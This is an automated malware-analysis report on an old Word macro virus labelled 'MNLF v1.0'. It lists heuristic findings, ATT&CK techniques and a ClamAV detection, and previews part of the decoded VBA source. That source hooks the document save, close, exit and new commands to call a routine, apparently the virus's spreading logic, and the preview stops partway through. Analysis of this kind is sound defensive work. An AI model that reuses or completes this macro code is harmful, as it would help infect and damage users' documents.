MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution
The sample exhibits characteristics of a legacy macro-based virus, with both WordBasic and VBA macros detected. The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or download additional payloads. The embedded artifact 'macros.bas' contains multiple subroutines, including 'AutoOpen', which is a common entry point for macro execution upon document opening, and a subroutine named 'FileSave' which contains comments referencing 'MNLF v1.0' and a message about freedom fighters, suggesting a potential historical or custom-made malware.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55782 bytes |
SHA-256: 8e5ada55d8ab8c2ecc2b20c696c8f711cd5ca01630ab87668524b1e3d221d7f1 |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1HNormal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MNLF" Sub A3062000() 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM End Sub 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Sub B2000306() 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM End Sub 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Sub C6200030() 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM End Sub 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ' 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ' 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ' MNLF v1.0 8/26/2000 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ' This Virus is Created to acknowledge the effort of all bangsamoro 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ' freedom Fighter in there quest for independence... The struggle will 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ' continue 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Sub FileSave() 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM On Error Resume Next 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Call BMA 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ActiveDocument.Save 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM End Sub 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Sub FileClose() 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM On Error Resume Next 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Call BMA 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM If ActiveDocument.Saved = (2 - 2) Then ActiveDocument.Save 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM ActiveDocument.Close 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM End Sub 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Sub FileExit() 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM On Error Resume Next 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Call BMA 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM If ActiveDocument.Saved = (2 - 2) Then ActiveDocument.Save 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Application.Quit 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM End Sub 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Sub FileNew() 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM On Error Resume Next 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM Dialogs(wdDialogFileNew).Show 'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM newfile$ = 1 'LOVE6/30/00 1:4 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.